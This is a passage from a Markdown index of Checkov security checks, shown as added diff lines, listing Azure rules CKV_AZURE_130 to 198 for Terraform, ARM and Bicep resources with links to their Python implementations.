CKV_AZURE_130 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables infrastructure encryption | Terraform | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLEncryptionEnabled.py) | +| 1907 | CKV_AZURE_131 | resource | azurerm_security_center_contact | Ensure that 'Security contact emails' is set | Terraform | [SecurityCenterContactEmails.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmails.py) | +| 1908 | CKV_AZURE_131 | parameter | secureString | SecureString parameter should not have hardcoded default values | arm | [SecureStringParameterNoHardcodedValue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/parameter/SecureStringParameterNoHardcodedValue.py) | +| 1909 | CKV_AZURE_131 | parameter | string | SecureString parameter should not have hardcoded default values | Bicep | [SecureStringParameterNoHardcodedValue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/param/azure/SecureStringParameterNoHardcodedValue.py) | +| 1910 | CKV_AZURE_132 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes | arm | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisableAccessKeyWrite.py) | +| 1911 | CKV_AZURE_132 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes | Bicep | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisableAccessKeyWrite.py) | +| 1912 | CKV_AZURE_132 | resource | azurerm_cosmosdb_account | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes | Terraform | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBDisableAccessKeyWrite.py) | +| 1913 | CKV_AZURE_133 | resource | azurerm_frontdoor_firewall_policy | Ensure Front Door WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Terraform | [FrontDoorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FrontDoorWAFACLCVE202144228.py) | +| 1914 | CKV_AZURE_134 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services accounts disable public network access | arm | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesDisablesPublicNetwork.py) | +| 1915 | CKV_AZURE_134 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services accounts disable public network access | Bicep | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesDisablesPublicNetwork.py) | +| 1916 | CKV_AZURE_134 | resource | azurerm_cognitive_account | Ensure that Cognitive Services accounts disable public network access | Terraform | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CognitiveServicesDisablesPublicNetwork.py) | +| 1917 | CKV_AZURE_135 | resource | azurerm_web_application_firewall_policy | Ensure Application Gateway WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Terraform | [AppGatewayWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGatewayWAFACLCVE202144228.py) | +| 1918 | CKV_AZURE_136 | resource | azurerm_postgresql_flexible_server | Ensure that PostgreSQL Flexible server enables geo-redundant backups | Terraform | [PostgreSQLFlexiServerGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLFlexiServerGeoBackupEnabled.py) | +| 1919 | CKV_AZURE_137 | resource | azurerm_container_registry | Ensure ACR admin account is disabled | Terraform | [ACRAdminAccountDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRAdminAccountDisabled.py) | +| 1920 | CKV_AZURE_138 | resource | azurerm_container_registry | Ensures that ACR disables anonymous pulling of images | Terraform | [ACRAnonymousPullDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRAnonymousPullDisabled.py) | +| 1921 | CKV_AZURE_139 | resource | azurerm_container_registry | Ensure ACR set to disable public networking | Terraform | [ACRPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRPublicNetworkAccessDisabled.py) | +| 1922 | CKV_AZURE_140 | resource | azurerm_cosmosdb_account | Ensure that Local Authentication is disabled on CosmosDB | Terraform | [CosmosDBLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBLocalAuthDisabled.py) | +| 1923 | CKV_AZURE_141 | resource | azurerm_kubernetes_cluster | Ensure AKS local admin account is disabled | Terraform | [AKSLocalAdminDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSLocalAdminDisabled.py) | +| 1924 | CKV_AZURE_142 | resource | azurerm_machine_learning_compute_cluster | Ensure Machine Learning Compute Cluster Local Authentication is disabled | Terraform | [MLCCLADisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLCCLADisabled.py) | +| 1925 | CKV_AZURE_143 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster nodes do not have public IP addresses | Terraform | [AKSNodePublicIpDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSNodePublicIpDisabled.py) | +| 1926 | CKV_AZURE_144 | resource | azurerm_machine_learning_workspace | Ensure that Public Access is disabled for Machine Learning Workspace | Terraform | [MLPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLPublicAccess.py) | +| 1927 | CKV_AZURE_145 | resource | Microsoft.Web/sites | Ensure Function app is using the latest version of TLS encryption | arm | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py) | +| 1928 | CKV_AZURE_145 | resource | Microsoft.Web/sites | Ensure Function app is using the latest version of TLS encryption | Bicep | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py) | +| 1929 | CKV_AZURE_145 | resource | Microsoft.Web/sites/slots | Ensure Function app is using the latest version of TLS encryption | arm | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py) | +| 1930 | CKV_AZURE_145 | resource | Microsoft.Web/sites/slots | Ensure Function app is using the latest version of TLS encryption | Bicep | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py) | +| 1931 | CKV_AZURE_145 | resource | azurerm_function_app | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | +| 1932 | CKV_AZURE_145 | resource | azurerm_function_app_slot | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | +| 1933 | CKV_AZURE_145 | resource | azurerm_linux_function_app | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | +| 1934 | CKV_AZURE_145 | resource | azurerm_linux_function_app_slot | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | +| 1935 | CKV_AZURE_145 | resource | azurerm_windows_function_app | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | +| 1936 | CKV_AZURE_145 | resource | azurerm_windows_function_app_slot | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | +| 1937 | CKV_AZURE_146 | resource | azurerm_postgresql_configuration | Ensure server parameter 'log_retention' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerLogRetentionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogRetentionEnabled.py) | +| 1938 | CKV_AZURE_147 | resource | azurerm_postgresql_server | Ensure PostgreSQL is using the latest version of TLS encryption | Terraform | [PostgreSQLMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLMinTLSVersion.py) | +| 1939 | CKV_AZURE_148 | resource | azurerm_redis_cache | Ensure Redis Cache is using the latest version of TLS encryption | Terraform | [RedisCacheMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheMinTLSVersion.py) | +| 1940 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine does not enable password authentication | arm | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | +| 1941 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine does not enable password authentication | Bicep | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | +| 1942 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine does not enable password authentication | arm | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | +| 1943 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine does not enable password authentication | Bicep | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | +| 1944 | CKV_AZURE_149 | resource | azurerm_linux_virtual_machine | Ensure that Virtual machine does not enable password authentication | Terraform | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMDisablePasswordAuthentication.py) | +| 1945 | CKV_AZURE_149 | resource | azurerm_linux_virtual_machine_scale_set | Ensure that Virtual machine does not enable password authentication | Terraform | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMDisablePasswordAuthentication.py) | +| 1946 | CKV_AZURE_150 | resource | azurerm_machine_learning_compute_cluster | Ensure Machine Learning Compute Cluster Minimum Nodes Set To 0 | Terraform | [MLComputeClusterMinNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLComputeClusterMinNodes.py) | +| 1947 | CKV_AZURE_151 | resource | Microsoft.Compute/virtualMachines | Ensure Windows VM enables encryption | arm | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMEncryptionAtHost.py) | +| 1948 | CKV_AZURE_151 | resource | Microsoft.Compute/virtualMachines | Ensure Windows VM enables encryption | Bicep | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMEncryptionAtHost.py) | +| 1949 | CKV_AZURE_151 | resource | azurerm_windows_virtual_machine | Ensure Windows VM enables encryption | Terraform | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMEncryptionAtHost.py) | +| 1950 | CKV_AZURE_152 | resource | azurerm_api_management | Ensure Client Certificates are enforced for API management | Terraform | [APIManagementCertsEnforced.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementCertsEnforced.py) | +| 1951 | CKV_AZURE_153 | resource | azurerm_app_service_slot | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py) | +| 1952 | CKV_AZURE_153 | resource | azurerm_linux_web_app_slot | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py) | +| 1953 | CKV_AZURE_153 | resource | azurerm_windows_web_app_slot | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py) | +| 1954 | CKV_AZURE_154 | resource | azurerm_app_service_slot | Ensure the App service slot is using the latest version of TLS encryption | Terraform | [AppServiceSlotMinTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotMinTLS.py) | +| 1955 | CKV_AZURE_155 | resource | azurerm_app_service_slot | Ensure debugging is disabled for the App service slot | Terraform | [AppServiceSlotDebugDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotDebugDisabled.py) | +| 1956 | CKV_AZURE_156 | resource | azurerm_mssql_database_extended_auditing_policy | Ensure default Auditing policy for a SQL Server is configured to capture and retain the activity logs | Terraform | [MSSQLServerAuditPolicyLogMonitor.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MSSQLServerAuditPolicyLogMonitor.py) | +| 1957 | CKV_AZURE_157 | resource | azurerm_synapse_workspace | Ensure that Synapse workspace has data_exfiltration_protection_enabled | Terraform | [SynapseWorkspaceEnablesDataExfilProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesDataExfilProtection.py) | +| 1958 | CKV_AZURE_158 | resource | Microsoft.Databricks/workspaces | Ensure Databricks Workspace data plane to control plane communication happens over private link | arm | [DatabricksWorkspaceIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DatabricksWorkspaceIsNotPublic.py) | +| 1959 | CKV_AZURE_158 | resource | Microsoft.Databricks/workspaces | Ensure Databricks Workspace data plane to control plane communication happens over private link | Bicep | [DatabricksWorkspaceIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DatabricksWorkspaceIsNotPublic.py) | +| 1960 | CKV_AZURE_158 | resource | azurerm_databricks_workspace | Ensure Databricks Workspace data plane to control plane communication happens over private link | Terraform | [DatabricksWorkspaceIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DatabricksWorkspaceIsNotPublic.py) | +| 1961 | CKV_AZURE_159 | resource | azurerm_function_app | Ensure function app builtin logging is enabled | Terraform | [FunctionAppEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppEnableLogging.py) | +| 1962 | CKV_AZURE_159 | resource | azurerm_function_app_slot | Ensure function app builtin logging is enabled | Terraform | [FunctionAppEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppEnableLogging.py) | +| 1963 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups | Ensure that HTTP (port 80) access is restricted from the internet | arm | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) | +| 1964 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups | Ensure that HTTP (port 80) access is restricted from the internet | Bicep | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) | +| 1965 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that HTTP (port 80) access is restricted from the internet | arm | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) | +| 1966 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that HTTP (port 80) access is restricted from the internet | Bicep | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) | +| 1967 | CKV_AZURE_160 | resource | azurerm_network_security_group | Ensure that HTTP (port 80) access is restricted from the internet | Terraform | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py) | +| 1968 | CKV_AZURE_160 | resource | azurerm_network_security_rule | Ensure that HTTP (port 80) access is restricted from the internet | Terraform | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py) | +| 1969 | CKV_AZURE_161 | resource | azurerm_spring_cloud_api_portal | Ensures Spring Cloud API Portal is enabled on for HTTPS | Terraform | [SpringCloudAPIPortalHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalHTTPSOnly.py) | +| 1970 | CKV_AZURE_162 | resource | azurerm_spring_cloud_api_portal | Ensures Spring Cloud API Portal Public Access Is Disabled | Terraform | [SpringCloudAPIPortalPublicAccessIsDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalPublicAccessIsDisabled.py) | +| 1971 | CKV_AZURE_163 | resource | azurerm_container_registry | Enable vulnerability scanning for container images. | Terraform | [ACRContainerScanEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRContainerScanEnabled.py) | +| 1972 | CKV_AZURE_164 | resource | azurerm_container_registry | Ensures that ACR uses signed/trusted images | Terraform | [ACRUseSignedImages.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRUseSignedImages.py) | +| 1973 | CKV_AZURE_165 | resource | azurerm_container_registry | Ensure geo-replicated container registries to match multi-region container deployments. | Terraform | [ACRGeoreplicated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRGeoreplicated.py) | +| 1974 | CKV_AZURE_166 | resource | azurerm_container_registry | Ensure container image quarantine, scan, and mark images verified | Terraform | [ACREnableImageQuarantine.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableImageQuarantine.py) | +| 1975 | CKV_AZURE_167 | resource | azurerm_container_registry | Ensure a retention policy is set to cleanup untagged manifests. | Terraform | [ACREnableRetentionPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableRetentionPolicy.py) | +| 1976 | CKV_AZURE_168 | resource | azurerm_kubernetes_cluster | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods. | Terraform | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSMaxPodsMinimum.py) | +| 1977 | CKV_AZURE_168 | resource | azurerm_kubernetes_cluster_node_pool | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods. | Terraform | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSMaxPodsMinimum.py) | +| 1978 | CKV_AZURE_169 | resource | azurerm_kubernetes_cluster | Ensure Azure Kubernetes Cluster (AKS) nodes use scale sets | Terraform | [AKSPoolTypeIsScaleSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSPoolTypeIsScaleSet.py) | +| 1979 | CKV_AZURE_170 | resource | azurerm_kubernetes_cluster | Ensure that AKS use the Paid Sku for its SLA | Terraform | [AKSIsPaidSku.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSIsPaidSku.py) | +| 1980 | CKV_AZURE_171 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster upgrade channel is chosen | Terraform | [AKSUpgradeChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUpgradeChannel.py) | +| 1981 | CKV_AZURE_172 | resource | azurerm_kubernetes_cluster | Ensure autorotation of Secrets Store CSI Driver secrets for AKS clusters | Terraform | [AKSSecretStoreRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSSecretStoreRotation.py) | +| 1982 | CKV_AZURE_173 | resource | azurerm_api_management | Ensure API management uses at least TLS 1.2 | Terraform | [APIManagementMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementMinTLS12.py) | +| 1983 | CKV_AZURE_174 | resource | azurerm_api_management | Ensure API management public access is disabled | Terraform | [APIManagementPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementPublicAccess.py) | +| 1984 | CKV_AZURE_175 | resource | azurerm_web_pubsub | Ensure Web PubSub uses a SKU with an SLA | Terraform | [PubsubSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PubsubSKUSLA.py) | +| 1985 | CKV_AZURE_176 | resource | azurerm_web_pubsub | Ensure Web PubSub uses managed identities to access Azure resources | Terraform | [PubsubSpecifyIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PubsubSpecifyIdentity.py) | +| 1986 | CKV_AZURE_177 | resource | azurerm_windows_virtual_machine | Ensure Windows VM enables automatic updates | Terraform | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMAutomaticUpdates.py) | +| 1987 | CKV_AZURE_177 | resource | azurerm_windows_virtual_machine_scale_set | Ensure Windows VM enables automatic updates | Terraform | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMAutomaticUpdates.py) | +| 1988 | CKV_AZURE_178 | resource | azurerm_linux_virtual_machine | Ensure linux VM enables SSH with keys for secure communication | Terraform | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/LinuxVMUsesSSH.py) | +| 1989 | CKV_AZURE_178 | resource | azurerm_linux_virtual_machine_scale_set | Ensure linux VM enables SSH with keys for secure communication | Terraform | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/LinuxVMUsesSSH.py) | +| 1990 | CKV_AZURE_179 | resource | azurerm_linux_virtual_machine | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | +| 1991 | CKV_AZURE_179 | resource | azurerm_linux_virtual_machine_scale_set | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | +| 1992 | CKV_AZURE_179 | resource | azurerm_windows_virtual_machine | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | +| 1993 | CKV_AZURE_179 | resource | azurerm_windows_virtual_machine_scale_set | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | +| 1994 | CKV_AZURE_180 | resource | azurerm_kusto_cluster | Ensure that data explorer uses Sku with an SLA | Terraform | [DataExplorerSKUHasSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerSKUHasSLA.py) | +| 1995 | CKV_AZURE_181 | resource | azurerm_kusto_cluster | Ensure that data explorer/Kusto uses managed identities to access Azure resources securely. | Terraform | [DataExplorerServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerServiceIdentity.py) | +| 1996 | CKV_AZURE_182 | resource | azurerm_virtual_network | Ensure that VNET has at least 2 connected DNS Endpoints | Terraform | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetSingleDNSServer.py) | +| 1997 | CKV_AZURE_182 | resource | azurerm_virtual_network_dns_servers | Ensure that VNET has at least 2 connected DNS Endpoints | Terraform | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetSingleDNSServer.py) | +| 1998 | CKV_AZURE_183 | resource | azurerm_virtual_network | Ensure that VNET uses local DNS addresses | Terraform | [VnetLocalDNS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetLocalDNS.py) | +| 1999 | CKV_AZURE_184 | resource | azurerm_app_configuration | Ensure 'local_auth_enabled' is set to 'False' | Terraform | [AppConfigLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigLocalAuth.py) | +| 2000 | CKV_AZURE_185 | resource | azurerm_app_configuration | Ensure 'Public Access' is not Enabled for App configuration | Terraform | [AppConfigPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigPublicAccess.py) | +| 2001 | CKV_AZURE_186 | resource | azurerm_app_configuration | Ensure App configuration encryption block is set. | Terraform | [AppConfigEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigEncryption.py) | +| 2002 | CKV_AZURE_187 | resource | azurerm_app_configuration | Ensure App configuration purge protection is enabled | Terraform | [AppConfigPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigPurgeProtection.py) | +| 2003 | CKV_AZURE_188 | resource | azurerm_app_configuration | Ensure App configuration Sku is standard | Terraform | [AppConfigSku.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigSku.py) | +| 2004 | CKV_AZURE_189 | resource | azurerm_key_vault | Ensure that Azure Key Vault disables public network access | Terraform | [KeyVaultDisablesPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultDisablesPublicNetworkAccess.py) | +| 2005 | CKV_AZURE_190 | resource | azurerm_storage_account | Ensure that Storage blobs restrict public access | Terraform | [StorageBlobRestrictPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageBlobRestrictPublicAccess.py) | +| 2006 | CKV_AZURE_191 | resource | azurerm_eventgrid_topic | Ensure that Managed identity provider is enabled for Azure Event Grid Topic | Terraform | [EventgridTopicIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicIdentityProviderEnabled.py) | +| 2007 | CKV_AZURE_192 | resource | azurerm_eventgrid_topic | Ensure that Azure Event Grid Topic local Authentication is disabled | Terraform | [EventgridTopicLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicLocalAuthentication.py) | +| 2008 | CKV_AZURE_193 | resource | azurerm_eventgrid_topic | Ensure public network access is disabled for Azure Event Grid Topic | Terraform | [EventgridTopicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicNetworkAccess.py) | +| 2009 | CKV_AZURE_194 | resource | azurerm_eventgrid_domain | Ensure that Managed identity provider is enabled for Azure Event Grid Domain | Terraform | [EventgridDomainIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainIdentityProviderEnabled.py) | +| 2010 | CKV_AZURE_195 | resource | azurerm_eventgrid_domain | Ensure that Azure Event Grid Domain local Authentication is disabled | Terraform | [EventgridDomainLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainLocalAuthentication.py) | +| 2011 | CKV_AZURE_196 | resource | azurerm_signalr_service | Ensure that SignalR uses a Paid Sku for its SLA | Terraform | [SignalRSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SignalRSKUSLA.py) | +| 2012 | CKV_AZURE_197 | resource | azurerm_cdn_endpoint | Ensure the Azure CDN disables the HTTP endpoint | Terraform | [CDNDisableHttpEndpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNDisableHttpEndpoints.py) | +| 2013 | CKV_AZURE_198 | resource | azurerm_cdn_endpoint | Ensure the Azure 